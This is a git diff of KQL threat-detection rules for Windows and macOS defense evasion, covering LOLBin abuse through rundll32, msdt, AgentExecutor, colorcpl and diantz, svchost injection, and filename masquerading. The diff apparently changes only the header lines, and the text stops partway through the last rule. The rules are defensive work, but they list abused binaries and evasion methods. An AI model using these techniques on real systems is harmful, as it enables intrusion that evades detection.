-// Description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.006
-// False Positives:
-// - Mistyped commands or legitimate binaries named to match the pattern
-
-DeviceProcessEvents
+// Title: Space After Filename - macOS
+// Author: remotephone
+// Date: 2021-11-20
+// Level: low
+// Description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.006
+// False Positives:
+// - Mistyped commands or legitimate binaries named to match the pattern
+
+DeviceProcessEvents
 | where ProcessCommandLine endswith " " or FolderPath endswith " "
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql b/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql
index 3df69197..a7af8e0c 100644
--- a/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql
+++ b/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql
@@ -1,12 +1,12 @@
-// Title: Start of NT Virtual DOS Machine
-// Author: frack113
-// Date: 2022-07-16
-// Level: medium
-// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Start of NT Virtual DOS Machine
+// Author: frack113
+// Date: 2022-07-16
+// Level: medium
+// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where FolderPath endswith "\\ntvdm.exe" or FolderPath endswith "\\csrstub.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspect_svchost_activity.kql b/KQL/rules/Defense Evasion/suspect_svchost_activity.kql
index 79d7382e..88b04fa2 100644
--- a/KQL/rules/Defense Evasion/suspect_svchost_activity.kql
+++ b/KQL/rules/Defense Evasion/suspect_svchost_activity.kql
@@ -1,12 +1,12 @@
-// Title: Suspect Svchost Activity
-// Author: David Burkett, @signalblur
-// Date: 2019-12-28
-// Level: high
-// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055
-// False Positives:
-// - Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf
-
-DeviceProcessEvents
+// Title: Suspect Svchost Activity
+// Author: David Burkett, @signalblur
+// Date: 2019-12-28
+// Level: high
+// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055
+// False Positives:
+// - Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql b/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql
index 2fcd7b4d..d641f110 100644
--- a/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Advpack Call Via Rundll32.EXE
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-17
-// Level: high
-// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Suspicious Advpack Call Via Rundll32.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: high
+// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "advpack" and ((ProcessCommandLine contains "#+" and ProcessCommandLine contains "12") or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql b/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql
index 14fcb2bd..206aa4dd 100644
--- a/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql
+++ b/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious AgentExecutor PowerShell Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
-// Date: 2022-12-24
-// Level: high
-// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Suspicious AgentExecutor PowerShell Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
+// Date: 2022-12-24
+// Level: high
+// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not((InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe" or (ProcessCommandLine contains "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" or ProcessCommandLine contains "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql b/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql
index 1e09ffa9..23296f4e 100644
--- a/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql
+++ b/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Application Allowed Through Exploit Guard
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-05
-// Level: high
-// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Suspicious Application Allowed Through Exploit Guard
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications" and (RegistryKey endswith "\\Users\\Public*" or RegistryKey endswith "\\AppData\\Local\\Temp*" or RegistryKey endswith "\\Desktop*" or RegistryKey endswith "\\PerfLogs*" or RegistryKey endswith "\\Windows\\Temp*")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql
index 2344db98..a8b9d805 100644
--- a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql
+++ b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql
@@ -1,11 +1,11 @@
-// Title: Suspicious BitLocker Access Agent Update Utility Execution
-// Author: andrewdanis, Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-10-18
-// Level: high
-// Description: Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes.
-// Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003
-
-DeviceProcessEvents
+// Title: Suspicious BitLocker Access Agent Update Utility Execution
+// Author: andrewdanis, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-18
+// Level: high
+// Description: Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes.
+// Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\baaupdate.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql b/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql
index bad7a535..14d6f073 100644
--- a/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Cabinet File Execution Via Msdt.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113
-// Date: 2022-06-21
-// Level: medium
-// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-// False Positives:
-// - Legitimate usage of ".diagcab" files
-
-DeviceProcessEvents
+// Title: Suspicious Cabinet File Execution Via Msdt.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113
+// Date: 2022-06-21
+// Level: medium
+// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Legitimate usage of ".diagcab" files
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -cab " or ProcessCommandLine contains " /cab " or ProcessCommandLine contains " –cab " or ProcessCommandLine contains " —cab " or ProcessCommandLine contains " ―cab ") and (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql
index 11de8336..f1415e43 100644
--- a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql
+++ b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Calculator Usage
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-02-09
-// Level: high
-// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: Suspicious Calculator Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-09
+// Level: high
+// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\calc.exe " or (FolderPath endswith "\\calc.exe" and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql b/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql
index 884bc1cc..1d313013 100644
--- a/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql
+++ b/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql
@@ -1,10 +1,10 @@ -// Title: Suspicious Child Process Created as System -// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) -// Date: 2019-10-26 -// Level: high -// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002 - -DeviceProcessEvents +// Title: Suspicious Child Process Created as System +// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) +// Date: 2019-10-26 +// Level: high +// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002 + +DeviceProcessEvents | where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and ((InitiatingProcessAccountName =~ "NETWORK SERVICE" and InitiatingProcessAccountDomain startswith "") or (InitiatingProcessAccountName =~ "LOCAL SERVICE" and InitiatingProcessAccountDomain startswith "")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and ((AccountName =~ "SYSTEM" and AccountDomain startswith "") or (AccountName =~ "Système" and AccountDomain startswith "") or (AccountName =~ "СИСТЕМА" and AccountDomain startswith ""))) and (not((ProcessCommandLine contains "DavSetCookie" and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql b/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql index db1a868c..508b59e7 100644 --- a/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql 
+++ b/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Child Process of AspNetCompiler -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-14 -// Level: high -// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 - -DeviceProcessEvents +// Title: Suspicious Child Process of AspNetCompiler +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-14 +// Level: high +// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents | where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\notepad.exe") or (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Roaming\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\")) and InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql b/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql index 252212e7..ef291be5 100644 --- a/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql 
@@ -1,10 +1,10 @@ -// Title: Suspicious Child Process Of Wermgr.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2022-10-14 -// Level: high -// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.t1036 - -DeviceProcessEvents +// Title: Suspicious Child Process Of Wermgr.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-14 +// Level: high +// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.t1036 + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe") and (not(((ProcessCommandLine contains "-queuereporting" or ProcessCommandLine contains "-responsepester") and (ProcessCommandLine contains "C:\\Windows\\system32\\WerConCpl.dll" and ProcessCommandLine contains "LaunchErcApp ") and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql b/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql index 90ae16f1..e60204e9 100644 
--- a/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql
+++ b/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious CodePage Switch Via CHCP
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019-10-14
-// Level: medium
-// Description: Detects a code page switch in command line or batch scripts to a rare language
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1036, attack.defense-evasion
-// False Positives:
-// - Administrative activity (adjust code pages according to your organization's region)
-
-DeviceProcessEvents
+// Title: Suspicious CodePage Switch Via CHCP
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-10-14
+// Level: medium
+// Description: Detects a code page switch in command line or batch scripts to a rare language
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1036, attack.defense-evasion
+// False Positives:
+// - Administrative activity (adjust code pages according to your organization's region)
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith " 936" or ProcessCommandLine endswith " 1258") and FolderPath endswith "\\chcp.com"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql
index 32aa93ca..c924af0d 100644
--- a/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql
+++ b/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Control Panel DLL Load
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-04-15
-// Level: high
-// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-
-DeviceProcessEvents
+// Title: Suspicious Control Panel DLL Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-04-15
+// Level: high
+// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\System32\\control.exe") and (not(ProcessCommandLine contains "Shell32.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql
index 0e46bca3..03e79ea8 100644
--- a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql
+++ b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql
@@ -1,15 +1,15 @@ -// Title: Suspicious Copy From or To System Directory -// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-07-03 -// Level: medium -// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. -// Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003 -// False Positives: -// - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) -// - When cmd.exe and xcopy.exe are called directly -// - When the command contains the keywords but not in the correct order - -DeviceProcessEvents +// Title: Suspicious Copy From or To System Directory +// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-07-03 +// Level: medium +// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. +// Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. 
+// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) +// - When cmd.exe and xcopy.exe are called directly +// - When the command contains the keywords but not in the correct order + +DeviceProcessEvents | where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS") and (not(((ProcessCommandLine contains "C:\\Program Files\\Avira\\" or ProcessCommandLine contains "C:\\Program Files (x86)\\Avira\\") and (ProcessCommandLine contains "/c copy" and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "\\avira_system_speedup.exe") and FolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql b/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql index 4abcd922..e633f25d 100644 --- a/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql +++ b/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql 
@@ -1,10 +1,10 @@
-// Title: Suspicious Creation with Colorcpl
-// Author: frack113
-// Date: 2022-01-21
-// Level: high
-// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564
-
-DeviceFileEvents
+// Title: Suspicious Creation with Colorcpl
+// Author: frack113
+// Date: 2022-01-21
+// Level: high
+// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\colorcpl.exe" and (not((FolderPath endswith ".icm" or FolderPath endswith ".gmmp" or FolderPath endswith ".cdmp" or FolderPath endswith ".camp")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql
index 76cfacf8..840e5a62 100644
--- a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql
+++ b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious CustomShellHost Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-19
-// Level: high
-// Description: Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1216
-// False Positives:
-// - False positives are unlikely, investigate matches carefully.
-
-DeviceProcessEvents
+// Title: Suspicious CustomShellHost Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: high
+// Description: Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+// - False positives are unlikely, investigate matches carefully.
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\CustomShellHost.exe" and (not(FolderPath =~ "C:\\Windows\\explorer.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql b/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql
index abb8f62b..072f8a0c 100644
--- a/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql
+++ b/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Diantz Alternate Data Stream Execution
-// Author: frack113
-// Date: 2021-11-26
-// Level: medium
-// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004
-// False Positives:
-// - Very Possible
-
-DeviceProcessEvents
+// Title: Suspicious Diantz Alternate Data Stream Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Very Possible
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql b/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql
index 910ba681..e06d1d9a 100644
--- a/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious DLL Loaded via CertOC.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-15
-// Level: high
-// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Suspicious DLL Loaded via CertOC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
